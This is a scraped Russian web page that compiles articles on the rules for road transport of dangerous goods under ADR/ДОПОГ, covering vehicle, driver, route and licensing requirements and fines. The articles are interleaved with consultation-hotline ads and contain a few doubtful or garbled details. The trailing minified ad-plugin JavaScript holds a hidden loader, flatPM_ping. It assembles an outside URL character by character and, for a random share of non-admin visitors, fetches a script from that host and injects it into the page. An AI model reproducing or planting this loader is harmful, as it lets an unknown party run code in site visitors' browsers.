Правило перевозок опасных грузов

Правила перевозки опасных грузов автомобильным транспортом и наказание за их нарушение

С егодня многие бизнесмены транспортируют свои грузы при помощи автотранспорта. Однако некоторые грузы могут представлять серьёзную опасность для окружающей среды, а также для других участников дорожного движения. Какие существуют правила перевозки опасных грузов автомобильным транспортом? Какой закон регулирует эти правила? И что будет за нарушение этих правил? Ниже мы узнаем ответы на эти вопросы.

Правила перевозки опасных грузов автотранспортом в РФ

Опасный груз — это груз, представляющий собой вещества и материалы, которые могут навредить человеку или окружающей среде.

Примеры опасных веществ и материалов:

  • ядовитые газы,
  • сильные кислоты,
  • радиоактивные материалы,
  • легковоспламеняющиеся жидкости и так далее.

Чтобы перевозить такие грузы, перевозчик должен придерживаться определённых правил, которые зафиксированы в специальном соглашении, которое называется ДОПОГ.

Возникла проблема? Позвоните нашему специалисту по таможенным вопросам:

+7 (499) 350-97-43 (звонок бесплатен)

Организация перевозок

ДОПОГ содержит большое количество инструкций, регулирующих правила перевозки. Рассмотрим основные из них более детально.

Требования к автотранспорту

Чтобы осуществить перевозку, автотранспорт должен удовлетворять следующим требованиям:

  • Труба глушителя должна располагаться перед радиатором.
  • Сзади на автомобиль или прицеп следует установить специальный противоударный бампер.
  • Следует подключить специальную цепь, которая заземлит электричество, а сами провода должны быть изолированы при помощи специального материала.
  • Бензобак, при помощи непроницаемой перегородки, отделяется от двигателя, аккумулятора, электрических проводов и кузова, чтобы избежать возгорания топлива в случае аварии.
  • Трубопроводы цистерн должны быть защищены от удара (чтобы в случае аварии опасное вещество не вылилось из цистерны).
  • ТС должно быть оснащено специальными опознавательными знаками — определённый цвет (в большинстве случаев это ярко-желтый), «мигалка», специальные надписи и информационные таблички.
  • Транспорт должен быть оснащен специальным оборудованием, с помощью которого можно устранить негативные последствия в случае аварии.

На информационных табличках указывается специальный буквенно-числовой код, а располагаются они спереди и сзади на автотранспорте. Код содержит информацию о том, что нужно делать в случае аварии. Расшифровка кода должна содержаться у водителя транспортного средства или экспедитора.

Маршрут следования

Также ДОПОГ регулирует маршрут следования груза. Перед транспортировкой необходимо обратиться в Ространснадзор по месту регистрации компании и подать заявку на составление маршрута.

ДОПОГ утверждает, что транспортное средство не должно пересекать следующие территории:

  • Крупные населенные пункты.
  • Заповедники, парки и зоны отдыха.
  • Различные промышленные объекты (заводы, фабрики, некоторые инженерные сооружения и так далее).
  • Больницы, детские сады, школы, университеты, лечебно-профилактические учреждения, пансионаты и так далее.
  • Территории, которые используются для проведения культурных мероприятий.

Порядок перевозки грузов

Также соглашение регулирует порядок перевозки. Чтобы осуществить перевозку какого-либо опасного груза, компания должна получить соответствующую лицензию.

Для оформления лицензии необходимо посетить Ространснадзор и предоставить следующие документы:

  • Заявление. В заявлении необходимо указать следующую информацию — характер груза и маршрут. Также в заявлении нужно указать лицо, которое будет нести ответственность за перевозку груза.
  • Аварийная карточка.
  • Свидетельство ДОПОГ.

Требования к водителю транспортного средства

Также следует помнить, что управлять транспортом может только специально обученный человек. Для этого необходимо пройти курсы, составленные в соответствии с ДОПОГ, а в конце нужно успешно сдать экзамен.

На данных курсах водитель узнает основные правила перевозки, а также о том, что нужно делать в случае аварии. Например, некоторые грузы в случае возгорания нельзя тушить водой — вряд ли человек без специального обучения может знать такую информацию.

Также существует ряд специфических правил, которых следует придерживаться водителю:

  • Перед каждым рейсом водитель должен проходить медосмотр.
  • Минимальный стаж работы — 3 года.
  • Водитель должен знать все основные правила, в соответствии с которым будет перевозиться груз. Он должен знать, что нужно делать в случае аварии. Также он должен уметь оказывать первую медицинскую помощь.
  • Существуют также особые требования, которые могут применяться в зависимости от типа груза. Например, при транспортировке радиоактивных веществ водитель должен быть одет в специальный защитный костюм, при транспортировке взрывоопасных грузов запрещено курить и так далее.

Требования к сопровождающему персоналу

Также существует ряд требований к сопровождающему персоналу:

  • Все сопровождающие лица должны пройти специальную подготовку.
  • Перед транспортировкой в Ространснадзоре необходимо получить разрешение на выполнение сопровождения.
  • Перед транспортировкой опасного груза водитель должен провести инструктаж.
  • Перед каждым рейсом весь сопровождающий персонал должен пройти медосмотр.
  • Погрузку и разгрузку могут осуществлять лица, которые занимаются подобной деятельностью не менее 3 лет.
  • Оператор должен знать, что нужно делать в случае аварии.

Для перевозки понадобятся следующие документы:

  • Стандартный пакет документов на груз: договор о транспортировке, паспорт водителя, водительское удостоверение, сопроводительные документы на груз и так далее.
  • Лицензия, которая разрешает компании транспортировать данный опасный груз.
  • Документ, подтверждающий факт прохождения техосмотра.
  • Маршрутный лист, в соответствии с которым будет двигаться транспортное средство.
  • Специальный документ, который подтверждает тот факт, что водитель прошел спецподготовку.

Международные правила перевозки опасных грузов

ДОПОГ является международным договором, поэтому международные правила перевозки совпадают с аналогичными российскими правилам.

Напомним несколько важных моментов, о которых нужно помнить при пересечении границы:

  1. В CMR-накладной необходимо указать класс опасного груза.
  2. Если водитель нарушит правила движения в другой стране, то он будет отвечать по законам этой страны.
  3. В некоторых случаях может потребоваться оформление дополнительных сертификатов. Например, перед ввозом радиоактивных материалов в некоторые страны необходимо получить дополнительное разрешение.

Для международной перевозки грузов автотранспортом желательно оформить книжку МДП. Использование TIR Carnet даёт ряд преимуществ для перевозчика.
О ПДД при перевозке негабаритных грузов автотранспортом подробнее здесь. До самой транспортировки придётся получить разрешение в нескольких инстанциях.

Нарушение правил перевозки

За нарушение правил ДОПОГ предусмотрена административная ответственность.

Следует понимать, что в большинстве случаев штраф будет наложен сразу на всех организаторов перевозки:

  • и на транспортную компанию,
  • и на должностное лицо,
  • и на водителя

Существует лишь небольшое количество случаев, когда может быть оштрафован лишь один участник перевозки. Например, водитель подделал свидетельство ДОПОГ и нарушил правила перевозки опасных грузов — в таком случае транспортная компания и должные лица не будут штрафоваться, а вот водителя ждёт серьёзное наказание: во-первых, административное наказание за нарушение правил перевозки, во-вторых, уголовное наказание за подделку документов.

В общем случае за нарушения правил перевозки опасных грузов предусмотрено следующее наказание:

Дополнительную информацию о правилах автотранспортировки опасного груза можно почерпнуть из данного видео:

Подведём итоги. Во-первых, транспортировка регулируется специальным международным договором ДОПОГ. Во-вторых, при перевозке нужно учитывать множество тонкостей и нюансов. В-третьих, за нарушение правил перевозки предусмотрена административная ответственность.

О правилах заполнения CMR читайте в нашей статье здесь.

Вы можете найти дополнительную информацию по теме в разделе Перевозка опасных грузов.

Бесплатная консультация по телефону:

+7 (499) 350-97-43 (звонок бесплатен)

Внимание! В связи с последними изменениями в законодательстве, юридическая информация в данной статье могла устареть!

Наш специалист бесплатно Вас проконсультирует.

Транспортировка опасных грузов: способы, правила, международные конвенции

Любые манипуляции с опасными грузами, в том числе и их перевозки, строго регламентированы национальными и международными правилами. Бизнесменам, решившим заниматься поставками материалов и веществ, входящих в категорию «опасных», необходимо знать все правила и требования в отношении перевозки опасных грузов.

В этом разделе пойдёт речь, в первую очередь, об определении понятия «опасные грузы», классов и маркировке, о способах их транспортировки, о правилах перевозки разными типами транспорта и международных конвенциях.

Опасные грузы

Опасный груз – это материалы или вещества, потенциально угрожающие окружающей среде, здоровью или жизни человека, а также материальным ценностям.

Всего, по классификации ООН, имеется 9 классов опасных грузов. Сюда относятся и взрывчатые вещества, и ядовитые газы, и другие вещества и материалы. Каждый класс имеет свой способ маркировки. Подробная информация о маркировке, таре, упаковке и классах опасных грузов вот здесь.

Перевозки опасных грузов — виды транспорта

Транспортировать опасные грузы можно разными способами. Выбор конкретного из них зависит от места назначения, класса опасного груза, общего бюджета, договоренностей между обеими сторонами. Можно выделить несколько основных видов перевозки:

  • Перевозка опасных грузов ж/д транспортом. Отличается повышенным уровнем безопасности и относительной финансовой доступностью. Если есть необходимость в перевозке большой партии, железные дороги решат и эту проблему. Можно наметить точную дату доставки груза, так как у поездов есть точное расписание. Одновременно с этим ж/д транспорт не отличается большой скоростью. Необходимо ориентироваться в правилах перевозки опасных грузов по железным дорогам, получить разрешение, оформить страховку.
  • Автомобильные перевозки опасных грузов. Способ отличает высокая скорость перевозки. При этом он довольно демократичен. Идеален для перевозки небольших партий груза на небольшие расстояния. При этом у перевозки автомобильным транспортом есть свои ограничения. В частности, он не подходит для перевозок больших партий груза. При организации такой транспортировки важно принимать во внимание погодные условия. Кроме того, автомобильные перевозки сопряжены с различными опасностями: кражи, аварии и так далее. К такой транспортировке предъявляются особые требования. Если вас интересуют правила перевозки опасных грузов автотранспортом, загляните сюда.
  • Воздушный транспорт. Отличается максимальной скоростью перевозки. Подходит для осуществления оперативных межконтинентальных транспортировок. В числе минусов воздушных перевозок можно отметить высокую стоимость и средний уровень безопасности груза при этом. Кроме того, на авиационном транспорте не удастся перевезти большие партии или габаритный груз.
  • Перевозка опасных грузов морским транспортом. Отличается наибольшей демократичностью в плане стоимости, а также высокой безопасностью. Позволяет транспортировать большие партии груза. Одновременно с этим при организации морских перевозок требуется учитывать погодные условия. Для подготовки транспортировки нужно сначала ознакомиться с правилами морской перевозки опасных грузов, произвести соответствующую упаковку, оформить все требуемые документы и разрешения.

Перед выбором способа транспортировки следует изучить особенности каждого из них, а затем соотнести полученные данные с вашей индивидуальной ситуацией. К примеру, если вам требуется высокая скорость, вы можете выбрать воздушный транспорт. Если же нужно перевезти большую партию груза, лучше обратить внимание на транспортировку по железным дорогам.

Правила перевозок

Перед организацией транспортировки опасного груза требуется обязательно изучить соответствующие правила. При такой перевозке важно и правильно упаковать, и закрепить груз, и нанести нужную маркировку. Одним из ключевых пунктов в организации транспортировки является также подготовка документов и разрешений. При международных перевозках опасных грузов могут потребоваться специальные разрешения, принятые в данной стране.

Для правового регулирования перевозок опасных грузов существуют специальные правила, главными из которых являются международные правила. Существуют общие правила и конвенции, регламентирующие перевозку опасных грузов. К ним относятся «Оранжевая книга ООН», «Базельская конвенция», КГПОГ и так далее. Также существуют правила, применимые к конкретному способу перевозки:

  1. Воздушный транспорт. Такие перевозки регулируются конвенцией «о международной гражданской авиации», инструкциями ИКАО и другими документами;
  2. Автомобильный транспорт. Основной документ, регулирующий автомобильные перевозки опасных грузов – ДОПОГ, подробнее здесь. Также к автомобильному транспорту применима КГПОГ.
  3. Морской транспорт. Такие перевозки организуются согласно пунктам СОЛАС 74, ВОПОГ, МАРПОЛ, КГПОГ.
  4. ЖД транспорт. Перевозки регулируются СМГС, МПОГ, КГПОГ.

При организации международных перевозок требуется учесть, что в каждом государстве есть своё законодательство по транспортировке опасных грузов, которое требуется соблюдать. Для того чтобы упростить процесс перевозки, лучше обратиться в специализированную организацию.

При организации перевозки опасных грузов нет лишних моментов. Здесь важна и упаковка, и маркировка, и крепление груза. Для успешного проведения доставки нужно правильно подобрать способ транспортировки. Перевозка должна проводиться в соответствии с правилами. Если маршрут международный, нужно учитывать и законы другого государства.

Бесплатная консультация по телефону:

Москва и Московская область: +7 (499) 703-48-81 (звонок бесплатен)

Санкт-Петербург и Лен.область: +7 (812) 309-93-24

Внимание! В связи с последними изменениями в законодательстве, юридическая информация в данной статье могла устареть!

Наш специалист бесплатно Вас проконсультирует.

ПРАВИЛА ПЕРЕВОЗКИ ОПАСНЫХ ГРУЗОВ 2019 2020

Движение автотранспортных средств и их взаимодействие на дорогах общего пользования на территории Российской Федерации регламентируеся правилами дорожного движения — ПДД. Так же этому нормативному акту подчиняется и перемещение грузового транспорта. В этом случае данные правила дополняются целым рядом законов и постановлений. При трансфере опасных веществ список определяющих документом расширяется еще. Таким образом, свод правил перевозки опасных грузов, координирующий оборот опасных материалов в пределах РФ будем называть так — правила перевозки опасных грузов автомобильным транспортом. Рассмотрим подробнее действующие правила перевозки опасных грузов автомобильным транспортом 2019 2020.

Правила перевозки опасных грузов автомобильным транспортом 2019 2020

Все договорные взаимоотношения, возникающие при транзите опасных грузов на автотранспортных средствах в качестве оказываемых услуг, регулируются

Правилами транспортировки грузов автомобилями от 15.04.2011 г. за N 272 , предусматривающими использование рекомендаций, изложенных в

ДОПОГ 2019 2020 — /соглашение о перевозке опасных грузов между странами/

и в соответствии

Правила перевозки опасных грузов автомобильным транспортом

В том случае, когда перевозка опасных грузов осуществляется для собственных целей организаций или физических лиц на автомобилях, принадлежащим им по праву собственности, не возникает договорных отношений. Такие виды транзита опасных грузов автотранспортом регламентируются

ПОГАТ от 8/08/95 г. При этом положения ПОГАТ о выдаче разрешений на транспортировку особо опасных грузов и утверждение маршрутов доставки в ГАИ не используются. На основании ст.31 Фед. закона от 8.11.07 г. за №257-ФЗ «Об автомобильных дорогах и о дорожной деятельности в РФ» передвижение по автодорогам транспорта, выполняющего перевозки опасных грузов, допускается только при присутствии спец.разрешения .

Соблюдение Правила перевозки опасных грузов является гражданской обязанностью каждого законопослушного члена общества. Иначе погоня за прибылью и не исполнение правила перевозки опасных грузов автомобильным транспортом влечет не только наложение существенного штрафа, но и может привести к возникновению чрезвычайных ситуаций с нанесением вреда здоровью людей и окружающей среде. Становится понятно, что обучение ДОПОГ правилам перевозки опасных грузов собственных сотрудников ложится на коммерческие транспортные компании, а значит и ответственность за нарушение Правила перевозки опасных грузов автомобильным транспортом 2019 2020 всецело на работодателях.

ПРАВИЛА ПЕРЕВОЗКИ ОПАСНЫХ ГРУЗОВ АВТОМОБИЛЬНЫМ ТРАНСПОРТОМ

Правила перевозки опасных грузов автомобильным транспортом разработаны в соответствии с Постановлением Правительства Российской Федерации от 23 апреля 1994 г. N 372 и определяют основные условия перевозок опасных веществ автомобильным транспортом, общие требования по обеспечению безопасности при их транспортировке, регламентируют взаимоотношения, права и обязанности участников перевозки опасных грузов.

При разработке Правил учтены положения и нормы действующих законодательных и нормативно-правовых актов, регулирующих порядок осуществления автотранспортной деятельности и перевозку опасных грузов в Российской Федерации (Гражданского кодекса Российской Федерации; Устава автомобильного транспорта, утвержденного Постановлением Совета Министров РСФСР от 8 января 1969 г. N 12; Правил перевозок грузов автомобильным транспортом, утвержденных Минавтотрансом РСФСР 30 июля 1971 г.; Правил дорожного движения, утвержденных Постановлением Совета Министров — Правительства Российской Федерации от 23 октября 1993 г. N 1090; Инструкции по обеспечению безопасности перевозки опасных грузов автомобильным транспортом, утвержденной МВД СССР 23 сентября 1985 г.), требования международных конвенций и соглашений, участником которых является Россия, в частности, Европейского соглашения о международной дорожной перевозке опасных грузов (ДОПОГ) .

В соответствии с Постановлением Правительства Российской Федерации от 3 февраля 1994 г. N 76 Россия официально присоединилась к ДОПОГ 28 апреля 1994 г.

Правила автотранспортировки опасных грузов: основные требования, которые нужно знать

В нашей стране весомая часть наземной перевозки международных грузов приходится на автотранспорт. И перевозка опасных грузов не является исключением.

Правила перевозки опасных грузов автотранспортом установлены международной конвенцией и межправительственными соглашениями. Для всех, кто планирует иметь дело с вредными веществами, полезно знать этот регламент.

Что такое опасный груз

Опасный груз – это материалы или вещества, которые могут нанести вред здоровью, окружающей среде и различным материальным ценностям.

К основным типам опасных грузов относят газы, жидкости, которые легко воспламеняются, вещества инфекционные и окисляющие, ядовитые химикаты, коррозийные, едкие продукты и пероксиды.

Среди вышеперечисленных существуют особо опасные грузы, сочетающие в себе физико-химические свойства. Чтобы осуществить их транспортировку, обязательно лицензирование.

Международные правила перевозки опасных веществ

Когда транспортировка осуществляется на территорию иностранного государства, необходимо иметь разрешение, в порядке, который предусматривает автомобильное сообщение между государствами. Водитель должен иметь свидетельство, что транспортное средство было допущено к перевозке.

Документы, с указанием правил перевозки опасного груза, которые нужно знать:

  1. ADR/ДОПОГ — Европейское соглашение о международных перевозках опасного груза. В случае отсутствия документа, компании-перевозчику запрещена транспортировка груза через границу.
  2. ДОПОГ — свод правил, которых необходимо придерживаться не только перевозчику, но и владельцу груза.
  3. Постановление правительства РФ за номером 372, в котором чётко указано, что водитель обязан пройти обучение по транспортировке опасных грузов и имеет права заниматься таким видом перевозки при водительском стаже от трёх лет. Эти правила актуальны для 2014 года.
  4. ПДД. В правилах указаны требования к изображениям и описания дорожных знаков, необходимых при перевозках опасного груза.

Во второй графе накладной CMR необходимо указать класс опасного груза, перевозимого на автотранспорте.

Если необходимо транспортировать ядерные материалы, радиоактивные вещества, то требуется разрешение, которое выдаёт Госатомнадзор РФ.

Важно знать, какие авто являются подходящими для перевозки данного вида груза.

Опасные грузы перевозятся транспортом, который выпускается специально для этих целей. Грузовые авто должны быть оборудованы соответственно:

  • Укреплённым топливным баком, отделённым от батареи аккумулятора при помощи перегородки.
  • Противооткатным упором (минимум одним), подходящим для диаметра колёс авто и его массы.
  • АВС — антиблокировочной тормозной системой повышенной износоустойчивости, а также запасной (аварийной) системой.
  • Предохранителями и ограничителями электрических цепей.
  • Выхлопной системой, удалённой от груза.

Классификация авто для перевозок:

  • цистерна;
  • лесовоз;
  • открытый и закрытый тип;
  • микроавтобус;
  • площадка для контейнера;
  • самосвал;
  • лесовоз

Как доставить товар из Поднебесной? Один из самых популярных способов — контейнерные перевозки из Китая, гарантирующие сохранность товаров, помещённых в контейнер.
При необходимости доставки негабарита автомобилем, нужно знать правила перевозки негабаритных грузов автотранспортом подробнее тут и документы, регламентирующие выполнение такого вида транспортировки.

Погрузка и разгрузка, изменение намеченного маршрута

Иногда маршрут необходимо изменить, это входит в задачи организации, которая перевозит груз.

Уполномоченные сотрудники обязаны составить новый маршрут и предоставить его в подразделение ГАИ МВД России. Чтобы принять опасный груз к транспортированию, в автотранспортную службу предоставляется паспорт безопасности по ГОСТ Р. 50587.

Когда водитель получает груз, ему следует проверить маркировку на таре в соответствии с ГОСТ 19433—88 и ДОПОГ.

Немаловажно знать схему информирования об опасности, в документе должны быть изложены все установки во время возникновения угрозы. К подобным документам можно отнести специализированные таблицы, аварийные карточки.

Практические мероприятия по отправке груза проводятся автотранспортными организациями.

Контроль за погрузкой и разгрузкой осуществляет уполномоченное лицо, сопровождающее груз.

Погрузка осуществляется в соответствии с установленными инструкциями, крайне важно не допускать ударов, толчков на тару, требуется соблюдать максимальную осторожность, не допускать манипуляций, которые вызывают искры. Чтобы осуществить погрузку опасного вещества, двигатель должен быть выключен, а водитель находиться на определённом расстоянии.

Очень важно обеспечить безопасность всех лиц, которые принимают участие в транспортировке.

Обязательным требованием является ручная погрузка, использование различных подъемных устройств не допускается, следует соблюдать все меры осторожности и не допустить, чтобы груз упал.

Перемещение производится по специально установленным подкладкам и трапам, используются настилы. Чтобы передвинуть бутыль с опасным веществом, нужно использовать тележку. Если груз переносится в корзине, следует быть уверенным, что ручка держится надежно. Эксперты тщательно проверяют мощность корзины и ее дно. Категорически запрещено переносить бутыли на плече или спине.

Места для погрузки, в том числе посты, выбираются в соответствии с установленными критериями. Они должны находиться не ближе 125 метров от жилых домов и других общественных построений и не ближе 50 метров от магистральных дорог.

Если груз транспортируется в гололёд, территория усыпается песком.

Заправка авто с опасным грузом производится на расстоянии 25 метров от других машин.

Скоростные ограничения устанавливаются автотранспортной организацией, учитывается дорожные условия. Чтобы определить маршрут перевозки, согласований со службой ГАИ МВД не требуется. Скорость движения автомобиля устанавливается в соответствии с правилами, при этом обеспечивается максимальная безопасность и сохранность груза.

В некоторых случаях нужен не один автомобиль, часто грузовые машины идут колоннами, расстояние между ними должно быть не меньше 50 метров. Если в местности есть спуски, подъемы, дистанция составляет не менее 300 метров.

Контроль за перевозкой опасных грузов на видео

Данный видеоролик наглядно покажет, как осуществляется надзор и контроль за ходом транспортировки опасных грузов в России.

Дополнительные требования к транспортировке

Когда водитель перевозит особо опасные грузы, стоянка «в любом месте» запрещена. Она разрешается в местности, которая находится в 200 метрах от построений, где живут люди и общественных зданий.

Стояночный тормоз и противооткатный упор обязательно устанавливаются. Если опасные грузы необходимо перевозить на расстояние более 500 км, автомашину нужно оборудовать запасным топливным баком. Данная установка должна быть согласована с подразделениями ГАИ МВД РФ, соответствующая пометка ставится в транспортный документ.

Чтобы последующие и предшествующие авто знали, что поблизости перевозится опасный груз, сверху ставится маячок желтого, оранжевого цветов, при этом необходимо сопровождение патрульного авто. Машина должна двигаться впереди колонны, она также должна быть оснащена проблесковым маячком. На сопровождающих автомобилях и самих грузовиках включаются фары ближнего света.

Нарушение вышеперечисленных правил и норм чревато серьёзными штрафами и убытками, как для собственника груза так и для перевозчика. При их соблюдении груз будет доставлен в целости и сохранности.

Дополнительные сведения по теме вы найдёте в рубрике «Опасные грузы».

Бесплатная консультация по телефону:

Москва и Московская область: +7 (499) 703-48-81 (звонок бесплатен)

Санкт-Петербург и Лен.область: +7 (812) 309-93-24

Внимание! В связи с последними изменениями в законодательстве, юридическая информация в данной статье могла устареть!

Наш специалист бесплатно Вас проконсультирует.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}